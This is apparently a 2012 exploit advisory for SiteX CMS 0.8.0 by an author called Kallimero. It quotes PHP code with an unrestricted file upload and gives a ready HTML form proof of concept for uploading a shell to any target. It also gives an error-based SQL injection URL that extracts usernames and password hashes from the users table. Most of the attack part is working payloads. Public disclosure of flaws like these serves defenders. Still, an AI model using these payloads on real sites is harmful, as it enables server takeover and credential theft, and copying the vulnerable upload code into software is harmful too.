# Exploit Title: SiteX 0.8.0 <= Multiple vulnerabilities
# Date: 23/11/2012
# Exploit Author: Kallimero
# Vendor Homepage: http://www.sitexcms.org/
# Version: 0.8.0
# Tested on: Debian
Introduction
============
SiteX is a simple open source cms, to manage little websites.
The vulnz
========
1- ) Arbitry File Upload
Uploadify.php page don't securise the upload
---------------[includes/uploadify/uploadify.php]---------------
if (!empty($_FILES)) {
$tempFile = $_FILES['Filedata']['tmp_name'];
$targetPath = $_SERVER['DOCUMENT_ROOT'] . $_REQUEST['folder'] . '/';
$targetFile = str_replace('//','/',$targetPath) . $_FILES['Filedata']['name'];
// (...)
move_uploaded_file($tempFile,$targetFile);
echo "1";
}
---------------[index.php]---------------
A simple upload...
Here is a PoC :
----------------------------------
<form method="post" action="http://[target]/includes/uploadify/uploadify.php?folder=/" enctype="multipart/form-data" >
<input type="file" name="Filedata">
<input type="submit" value="Shell it baby !">
</form>
----------------------------------
2- ) SQL injections
There are many SQL injections. I just paste here an easy one :
http://[site]/redirect.php?linkid=1'+and+(select+'the game'+from(select+count(*),concat((select+concat(username,0x3a,password,0x27)+from+SiteX_Users+limit+0,1),floor(Rand(0)*1337))+as+s+from+information_schema.tables+group+by+s)b)-- -
Error based.
3- ) Others
This cms globalize all the user inputs, therefore, there's a huge amount of vulnerabilities.
I report here juste a tiny selection.
How to Fix ?
============
I mailed the developers, no response.
Stop using that, until they fix it.
Thanks
=========
All hwc members : Necromoine, fr0g, AppleSt0rm, St0rn, Zhyar, k3nz0, gr4ph0s.
Please visit : http://orgasm.re/
Groucho